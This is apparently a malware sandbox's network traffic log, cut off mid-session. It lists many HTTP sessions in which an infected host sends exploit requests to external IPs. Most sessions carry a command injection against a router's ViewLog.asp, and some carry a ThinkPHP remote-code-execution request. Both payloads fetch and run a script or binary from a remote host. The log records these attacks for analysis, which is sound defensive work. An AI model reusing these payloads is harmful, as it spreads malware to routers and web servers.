                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      790192.168.2.153577262.192.141.1538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.482158899 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:40.693490028 CET135INHTTP/1.1 404 Not Found
                                                      server: owsd
                                                      content-type: text/html
                                                      content-length: 38
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><h1>404</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      791192.168.2.153329894.247.150.848080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.487742901 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      792192.168.2.154110485.31.60.1918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.500978947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      793192.168.2.154036662.29.44.2118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.538902998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      794192.168.2.153286694.120.254.978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.539268017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      795192.168.2.153963495.170.66.22280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:41.244570971 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:41.445836067 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      796192.168.2.155949095.216.154.22680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:41.261432886 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:41.481606960 CET339INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:30:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      797192.168.2.153435095.175.122.20780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:41.274544001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      798192.168.2.153964295.170.66.22280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:41.636008024 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      799192.168.2.155069231.136.22.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.052937984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.736027956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.079911947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.959820986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.335711956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.087393999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:26.359019995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:09.365540028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      800192.168.2.153907431.200.108.2258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.065463066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      801192.168.2.155851894.121.124.1248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.065498114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      802192.168.2.154551062.150.124.1898080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.109034061 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.399617910 CET109INHTTP/1.1 302 Found
                                                      Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      803192.168.2.155844285.122.218.1568080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.169564962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      804192.168.2.154608031.136.31.1268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.259306908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.896123886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.144005060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.703915119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:52.823734045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:02.807480097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.311077118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269906998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      805192.168.2.154417885.221.208.1308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.285439014 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      806192.168.2.154660894.250.30.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.309223890 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
